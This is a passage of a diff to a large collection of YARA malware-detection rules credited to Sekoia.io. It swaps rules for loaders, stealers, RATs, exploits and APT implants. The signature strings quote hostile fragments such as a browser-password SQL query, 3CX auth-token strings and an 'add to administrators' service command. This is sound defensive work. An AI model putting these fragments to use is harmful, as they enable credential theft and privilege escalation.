-		$ = "[+] Successfully overwrote wdigest's g_fParameter_UseLogonCredential" wide
-		$ = "[!] ERROR: could not allocate memory for the handl" wide
-		$ = "[+] [ProcessProtection] Found the handle of the current" wide
-		$ = "[+] [ProcessProtection] Found self process EPROCCES struct at" wide
-		$ = "ETW Threat Intel ProviderEnableInfo address could not be found." wide
-		$ = "The ETW Threat Intel provider was successfully" wide
-		$ = "[+] [NotifyRountines]" wide
-		$ = "[callback addr: 0x" wide
-		$ = "EDR / security products driver(s)" wide
-		$ = "Object callback offsets not loaded ! Aborting..." wide
-		$ = "No more space to store object callbacks !!" wide
+		$ = {24 00 44 00 6F 00 77 00 6E 00 6C 00 6F 00 61 00 64 00 55 00 72 00 6C 00 20 00 3D 00 20 00 27}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Loader_Win_Erbium : FILE
+rule SEKOIA_Rat_Win_Hiddenz : FILE
 {
 	meta:
-		description = "Detect the Erbium loader based on specific user-agent and URI"
+		description = "Lazy rule to detect Hiddenz's HVNC sample based on te malware name contained in numerous samples"
 		author = "Sekoia.io"
-		id = "d1e5be62-5677-4ef4-9f10-65baf36ab619"
-		date = "2022-09-30"
+		id = "4e582cda-4c50-4554-8e26-9d26206a02ee"
+		date = "2022-08-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_erbium.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e93e9dbf0e5412afa4640b4cf5d94374c4df38f8044d44c375e86508c0d4190a"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_hiddenz.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "92f62c893d8a081cd52deaaac93d622fbb1c8e9c7df214e34c6b8066be72a424"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242663,26 +243389,25 @@ rule SEKOIA_Loader_Win_Erbium : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36" wide
-		$str02 = "cloud/getHost.php?method=getstub&bid=" wide
-		$str03 = "api.php?method=getstub&bid=" wide
-		$api = "WinHttp" ascii
+		$name0 = "Hiddenz's HVNC" wide ascii
+		$name1 = "Hiddenzs_HVNC_DLL" wide ascii
+		$name2 = "HiddenzHVNC" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of ( $str* ) and #api > 6
+		uint16( 0 ) == 0x5A4D and 1 of ( $name* )
 }
-rule SEKOIA_Apt_Emissarypanda_Web_Auto_Attack_Tool : FILE
+rule SEKOIA_Backdoor_Powershellempire_Python : FILE
 {
 	meta:
-		description = "Detect LuckyMouse's Web auto attack tool"
+		description = "Detects Empire Python version"
 		author = "Sekoia.io"
-		id = "c93eb792-a443-4c9a-8fcb-6015cc69f9b3"
-		date = "2022-08-03"
+		id = "c2913f60-46a2-42c1-8569-72568eaddaed"
+		date = "2022-04-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_emissarypanda_web_auto_attack_tool.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "bc55758367ba0a6b5cf963bcb51b7770b2c7b1cf43b0b79e663b4110f6a7bba8"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_powershellempire_python.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "81c74a73ff7fe02420f29a53b350f1b53964f5a04f0694fed5b1b4bd6cc5ad03"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242690,29 +243415,24 @@ rule SEKOIA_Apt_Emissarypanda_Web_Auto_Attack_Tool : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[192.168.1.1/24|192.168.1.1|192.168.1|@host.txt]" ascii
-		$ = "80,s443,8080,s8443,8000-8010" ascii
-		$ = "exploit When find module vul" ascii
-		$ = "<title>\\s*(.*?)\\s*</title>" ascii
-		$ = "<meta.+?charset=[^\\w]?([-\\w]+)" ascii
-		$ = "%s is not existed" ascii
-		$ = "%-15s %4d Open" wide
+		$ = "import sys,base64;exec"
+		$ = "aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 500KB
+		all of them and filesize < 1MB
 }
-rule SEKOIA_Apt_Unc4990_Explorer_Ps1_Reverse_B64 : FILE
+rule SEKOIA_Tool_Sharpefspotato_Strings : FILE
 {
 	meta:
-		description = "Detects reverse base64 files (explorer.ps1)"
+		description = "Detects SharpEfsPotato based on strings"
 		author = "Sekoia.io"
-		id = "35c3ffb2-2ced-426c-ac3f-a8cd0c357672"
-		date = "2024-02-01"
+		id = "4286c72b-c0b9-4d2c-9847-68fc39ed4894"
+		date = "2023-06-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_unc4990_explorer_ps1_reverse_b64.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "bf13fbf2dbe6a718510f3e435a9fe06517ed962f8e129d79a15e6a301e5713ca"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_sharpefspotato_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4987b0d728472186a255adc1fba2d72288dd1f2b368212afd08ea8d7ff18e992"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242720,53 +243440,52 @@ rule SEKOIA_Apt_Unc4990_Explorer_Ps1_Reverse_B64 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s0 = "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\""
-		$s1 = "Wa1VHJ\"[-1..-"
-		$s2 = "-join '')))"
+		$ = "Program to launch (default cmd.exe)" wide
+		$ = "[!] Cannot perform interception, necessary privileges missing." wide
+		$ = "[!] Failed to created impersonated process with token:" wide
+		$ = "No authenticated interception took place, exploit failed"
 
 	condition:
-		all of them and $s0 at 0 and @s2 - @s2 < 20
+		uint16be( 0 ) == 0x4d5a and 3 of them
 }
-rule SEKOIA_Apt_Implant_Xdealer_Strings : FILE
+rule SEKOIA_Apt_Muddywater_Powershell_Reverse_Secure_Proxy
 {
 	meta:
-		description = "Detects XDealer based on strings"
+		description = "Detects PowerShell Reverse Secure Proxy"
 		author = "Sekoia.io"
-		id = "06ef72ca-b4e3-493b-8e01-d34b98259c6d"
-		date = "2024-03-22"
+		id = "b255f327-cb56-41b7-82f7-83ee23f791a5"
+		date = "2023-11-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_implant_xdealer_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "13c0bbc933f68164b0fe1c2768148bb649b1755bed0cfbc6ed90188fab6876d5"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_muddywater_powershell_reverse_secure_proxy.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6507bc030d60af5559492bbb02bc619646306ab06c9bd9d3f78ae6ce55307bda"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "unknow_PC"
-		$ = "rdp-tcp#"
-		$ = "Din_%s_%s_%u_"
-		$ = "nslookup %s %s"
-		$ = "XFByb2dyYW1EYXRhXA=="
+		$ = "$CS.Read($buff,4,2) | Out-Null" ascii wide
+		$ = "$DP = $buff[2]*256 + $buff[3]" ascii wide
+		$ = "$PS3.BeginInvoke() | Out-Null" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them and filesize < 1MB
+		all of them
 }
-rule SEKOIA_Apt_Uac0154_Powershell_Infection_Chain_2 : FILE
+rule SEKOIA_Loader_Amadey_Stealer_Plugin : FILE
 {
 	meta:
-		description = "UAC-0154 Infection chain"
+		description = "Finds Amadey's stealer plugin based on characteristic strings"
 		author = "Sekoia.io"
-		id = "6fe37d52-9bd3-4aa8-83ba-15399bd1b66c"
-		date = "2023-10-02"
+		id = "50154e39-98b3-40e5-8986-18bbb7b15647"
+		date = "2023-05-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_uac0154_powershell_infection_chain_2.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "029d88971030a377b3c93ba4c986668e53b01ee03ba94a0a4ceb54b20b72ff2d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_amadey_stealer_plugin.yar#L1-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0410492f9424797b670a14f43ce063458e59d7958e213c07c3d488a40bf370e6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242774,71 +243493,62 @@ rule SEKOIA_Apt_Uac0154_Powershell_Infection_Chain_2 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "files.catbox.moe"
-		$ = "$pse = $pse.Replace"
-		$ = "start -WindowStyle Hidden -FilePath $p"
-		$ = "-bxor $xorMask"
-		$ = "SysctlHost"
+		$str01 = "STEALERDLL.dll" ascii
+		$str02 = "?wal=1" fullword ascii
+		$str03 = "Content-Disposition: form-data; name=\"data\"; filename=\"" ascii
+		$str04 = "tar.exe -cf \"" ascii
+		$str05 = "SELECT origin_url, username_value, password_value FROM logins" ascii
+		$str06 = "\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
+		$str07 = "\\SputnikLab\\Sputnik\\User Data\\Default\\Login Data" ascii
+		$str08 = "\\Mozilla\\Firefox\\Profiles\\" ascii
+		$str09 = "\"hostname\":\"([^\"]+)\"" ascii
+		$str10 = "\"encryptedUsername\":\"([^\"]+)\"" ascii
+		$str11 = "\"encryptedPassword\":\"([^\"]+)\"" ascii
+		$str12 = "&cred=" fullword ascii
+		$str13 = "D:\\Mktmp\\Amadey\\StealerDLL\\x64\\Release\\STEALERDLL.pdb" ascii
 
 	condition:
-		4 of them and filesize < 100KB
+		uint16( 0 ) == 0x5A4D and 7 of them
 }
-rule SEKOIA_Infostealer_Win_Stealerium : FILE
+rule SEKOIA_Apt_Cerana_Keeper_Dropboxflop : FILE
 {
 	meta:
-		description = "Detects Stealerium based on specific strings"
+		description = "Detects DropboxFlop malware"
 		author = "Sekoia.io"
-		id = "165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5"
-		date = "2022-12-01"
+		id = "e077901f-3847-45f3-82cb-d52724cd3fb5"
+		date = "2024-10-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_stealerium.yar#L1-L36"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f420848164ad4b6966f2a776a58d90b7d70c8b151a42d6f56b654f1700b5e564"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_cerana_keeper_dropboxflop.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "2b65b74e52fbf25cb400dbdfcd1a06a7"
+		logic_hash = "5b2dfdf0c35f574e7006bb3e6eafa10d0e7fc7d980d443b31d4d6d6b7cec2fce"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$stl = "Stealerium" ascii wide
-		$str01 = "Processe: " wide
-		$str02 = "Compname: " wide
-		$str03 = "Language: " wide
-		$str04 = "SandBoxie: " wide
-		$str05 = "== System Info ==" wide
-		$str06 = "== Hardware ==" wide
-		$str07 = "== Domains ==" wide
-		$str08 = "WEBCAMS COUNT: " wide
-		$str09 = "[Virtualization]" wide
-		$str10 = "[Open google maps](" wide
-		$str11 = "Remember password: " wide
-		$str12 = "Target.Browsers.Firefox" ascii
-		$str13 = "Modules.Keylogger" ascii
-		$str14 = "ClipperAddresses" ascii
-		$str15 = "ChromiumPswPaths" ascii
-		$str16 = "DetectedBankingServices" ascii
-		$str17 = "DetectCryptocurrencyServices" ascii
-		$str18 = "CheckRemoteDebuggerPresent" ascii
-		$str19 = "GetConnectedCamerasCount" ascii
-		$str20 = "costura.discord-webhook-client.dll.compressed" ascii wide
+		$ = "<assemblyIdentity type=\"win32\" name=\"dropboxflop\""
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 1MB and ( ( #stl > 5 and 2 of ( $str* ) ) or 15 of ( $str* ) )
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Tool_Edrsandblast_Kernelcallbacks : FILE
+rule SEKOIA_Apt_Kimsuky_Fpspy : FILE
 {
 	meta:
-		description = "Detects EDRSandblast KernelCallbacks strings"
+		description = "Detects FPSpy, a backdoor used by Kimsuky"
 		author = "Sekoia.io"
-		id = "74cf4444-5bd6-4167-930a-5dbf2e529f92"
-		date = "2024-11-25"
+		id = "75d41851-a7a6-4068-8ea5-6a3e6e62a965"
+		date = "2024-09-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_edrsandblast_kernelcallbacks.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ffb1185dca42c5b2b273c3a48f3ba86204a3474a9a045f72dbdb0ba7c9e89c7d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_fpspy.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "6d6c1b175e435f5564341cc1f2c33ddf"
+		hash = "54c58b72f98cb63c44e7694add551e9d"
+		logic_hash = "65904b77a30b2e2a25f8d80ab32742f0ad931f07c034ae576a4fbde7e1fd999c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242846,119 +243556,104 @@ rule SEKOIA_Tool_Edrsandblast_Kernelcallbacks : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[+] '%s' service ACL configured to for Everyone" wide
-		$ = "%s callback of EDR driver \"%s\" [callback addr: 0x%I64x" wide
-		$ = "[!] Could not resolve %s kernel module's address" wide
+		$ = "Chrome/31.0." wide
+		$ = "%srundll32.exe %s, %s %%1" wide
+		$ = "MazeFunc" wide
+		$ = "sys.dll" wide
+		$ = "KLog" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 3MB and 3 of them
+		uint16be( 0 ) == 0x4d5a and 4 of them
 }
-
-rule SEKOIA_Loader_Win_Stealthvector : FILE
+rule SEKOIA_Implant_Mac_Smoothoperator_Update_Agent : FILE
 {
 	meta:
-		description = "Detect the StealthVector malware, updated in July 2024"
+		description = "UpdateAgent payload delivered by SmoothOperator during the 3CX supply chain attack"
 		author = "Sekoia.io"
-		id = "ecf6421a-f492-43c4-9ed7-eb4724d24779"
-		date = "2021-08-26"
+		id = "45a1d0d9-083b-4b4a-b53c-e5d86f804f01"
+		date = "2023-07-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_stealthvector.yar#L4-L32"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "71ea017462bbb1891ef306d1e56dece5864885f5c8db5c50431ab085d37bda03"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_mac_smoothoperator_update_agent.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d5a0d87ac810097983df92ab1b1ff9775093b0aaaf551a74ff6fe5149dbd3a21"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
-		modification_date = "2024-07-15"
 		classification = "TLP:CLEAR"
-		hash1 = "166b6dcdac31f4bf51e4b20a7c3f7d4f7017ca0c30fa123d5591e25c3fa66107"
-		hash2 = "ab56501167fe689fe55f6e6ddc3bb91952299bd5c3ef004b02bf1c3b4061c7cf"
-		hash3 = "0faddbe1713455e3fc9777ec45adf07b28e24f4c3ddca37586c2aa6b539898c0"
-		hash4 = "1c88150ec85a07c3db5f18c5eedcb0b653467b897af01d690ed996e5e07ba8e3"
-		hash5 = "ec10a9396dca694fe64366e0dab82d046cf92457f97efd50a68ceb85adef6b74"
 
 	strings:
-		$s1 = "Global\\kREwdFrOlvASgP4zWZyV89m6T2K0bIno" ascii
-		$s2 = "Global\\v5EPQFOImpTLaGZes3Nl1JSKHku8AyCw" ascii
+		$ = "3CX Desktop App/.main_storage"
+		$ = "3CX Desktop App/config.json"
+		$ = "3cx_auth_token_content=%s"
+		$ = "3cx_auth_id=%s"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of them or pe.imphash ( ) == "0cd7b92b97ccc7e255df1f46b5299986" or pe.imphash ( ) == "be777e91e3c42ac62471cfb7239be471" or hash.md5 ( pe.rich_signature.clear_data ) == "fcc67611d136cce0e785029bbb879b45"
+		uint32be( 0 ) == 0xcffaedfe and 2 of them
 }
-rule SEKOIA_Apt_Polonium_Technocreep_Strings : FILE
+rule SEKOIA_Tool_Revsocks_Strings : FILE
 {
 	meta:
-		description = "Tries to detect TechnoCreep implant"
+		description = "Detects revsocks client"
 		author = "Sekoia.io"
-		id = "dad79df3-b081-458e-9c14-1d5e2b43ba91"
-		date = "2022-10-12"
+		id = "f5f34e74-0795-4c81-a385-218a8197a0b7"
+		date = "2024-03-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_polonium_technocreep_strings.yar#L1-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6fbd14d39f215b835c0fe7709041ca982774be42d389397d19a41fda6f7a00d1"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_revsocks_strings.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f1702aaaebc1ba720f688f0694a69fef55a2556b1f07dd4b846be1ae32ff5529"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.1"
+		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "file name : " ascii wide
-		$ = "copy to : " ascii wide
-		$ = "download" ascii wide
-		$ = "persistence" ascii wide
-		$ = "/cmdResult created!" ascii wide
-		$ = "/downloadsResulat created!" ascii wide
-		$ = "Downloading will take minets..." ascii wide
-		$ = "powershell -Command \"$c1 = " ascii wide
-		$ = "Missing Parameter.. Format of command:" ascii wide
-		$ = "File Fath On Target Device Not Exists>" ascii wide
-		$ = "/MissingDownloadParameter.txt" ascii wide
+		$ = "reverse socks5 server/client by kost" ascii fullword
+		$ = "github.com/kost/"
+		$ = "revsocks -listen"
+		$ = "Start on the DNS server: revsocks -dns"
+		$ = "crypto/aes."
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xcafebabe or uint32be( 0 ) == 0xCFFAEDFE ) and 3 of them
 }
-rule SEKOIA_Tool_Exploit_Comahawk_Strings : FILE
+
+rule SEKOIA_Rat_Win_Romcom_Payload
 {
 	meta:
-		description = "Detects COMahawk exploit compiled binaries"
+		description = "Detect the RomCom malware"
 		author = "Sekoia.io"
-		id = "cc0d10ae-1a14-48c1-9c45-d65fac15f8f1"
-		date = "2022-09-09"
+		id = "c391f84c-f0cb-42d8-a8d8-d59725bf74c2"
+		date = "2022-11-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_exploit_comahawk_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a80fed3fd64562dd3e2fa197ca3d2aaf8e33783729b725c71f7eb8931af70d82"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_romcom_payload.yar#L4-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "56f016df8e9165522e18f34bdb7c3044ee8927f53dd6818fa2b3d6424191d8e0"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$ = "sc config UsoSvc binpath=" wide
-		$ = "binpath= \"cmd.exe /c net localgroup administrators /add"
-		$ = "[+] Command executed."
-		$ = "Release\\COMahawk.pdb"
-		$ = " is added as an admin."
-
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
+		for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "160ed1cdf6e9321cef19cfed6a63b4b5557dd35e174b821bf8a81c4146fa6536" )
 }
-rule SEKOIA_Exploit_Linux_Eop_Dirtyc0W_Strings : FILE
+rule SEKOIA_Apt_Implant_Xdealer_Stealer_Strings : FILE
 {
 	meta:
-		description = "Detects DirtyCow exploit"
+		description = "Detects stealer module of XDealer"
 		author = "Sekoia.io"
-		id = "f0551e56-b08f-4f6f-81df-f30fbb8ee7b8"
-		date = "2023-12-08"
+		id = "6314cf6c-2c3b-4e9a-87a1-b56ee148474c"
+		date = "2024-03-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/exploit_linux_eop_dirtyc0w_strings.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "70f0dda642e7892e35c1afabb4fa6a9fe62ad82d5aa2d90787e83809bc6f5859"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_implant_xdealer_stealer_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "79ba2fd14cd2eb73848026f79ce6115df813e0fda3a071ab26659874e04e2201"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242966,25 +243661,26 @@ rule SEKOIA_Exploit_Linux_Eop_Dirtyc0W_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "DirtyCow root privilege escalation"
-		$ = "Backing up %s to /tmp/bak"
-		$ = "(o o)_____/"
+		$ = "%sbmp.tmp"
+		$ = "%sjgp.tmp"
+		$ = "%sma_%s_%05u_%u."
+		$ = "%s%s_%05u_%u."
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 500KB and all of them
 }
-rule SEKOIA_Apt_Mustangpanda_Downloader : FILE
+rule SEKOIA_Rat_Win_Tutclient : FILE
 {
 	meta:
-		description = "Detects the MustangPanda Downloader"
+		description = "Detect the open-source RAT TutClient"
 		author = "Sekoia.io"
-		id = "54850ffd-f93b-4082-b3ca-8e1d60b35422"
-		date = "2022-03-02"
+		id = "2bd2d61f-3654-4acd-9773-8d3617c67ee0"
+		date = "2024-02-09"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_mustangpanda_downloader.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0bff0ee2960ecfa29939720e7efacaa35359f4fe555ae160c674efebf29bf61e"
+		reference = "https://github.com/AdvancedHacker101/C-Sharp-R.A.T-Client"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_tutclient.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f780948ab03dd0cd64d023367186a88c9eaa566170142e34aaa08788d9a684eb"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242992,27 +243688,28 @@ rule SEKOIA_Apt_Mustangpanda_Downloader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Windows Api" wide nocase
-		$ = "200 OK" wide
-		$ = "200 ok" wide
-		$ = "mscoree.dll" wide
+		$ = "Clipboard Data Not Retrived!" wide
+		$ = "Remote Cmd stream reading failed!" wide
+		$ = "PasswordFox" wide
+		$ = "[Right Click, Position: x = <rtd.xpos>; y = <rtd.ypos>]" wide
+		$ = "SendCommand"
+		$ = "HandleCommand"
 
 	condition:
 		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Win_Malware_Statc_Downloader : FILE
+rule SEKOIA_Exploit_Ez_Pwnkit_Strings : FILE
 {
 	meta:
-		description = "Statc Downloader powershell script. Base64 powershell"
+		description = "Detects ez-pwnkit exploit"
 		author = "Sekoia.io"
-		id = "4a2e9607-635b-4cd8-ba27-d70e0c76fd45"
-		date = "2023-08-09"
+		id = "24301f35-8174-4e0d-b14a-fc7e45a29b26"
+		date = "2024-01-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/win_malware_statc_downloader.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "173ea5af2e71b6ed70abd52a5d2f4de040393a6d2ff4978bbb6e73d96742b010"
-		logic_hash = "a99970a6ace88234e5e2bda009f8d87e6a0dc8c1a4655cca128e30292a21502c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/exploit_ez_pwnkit_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "36ec579f6c2dfeaf4ae6f6559d565d418a1f31199102eaa390ca36493f5b18cd"
 		score = 75
 		quality = 80
 		tags = "FILE"
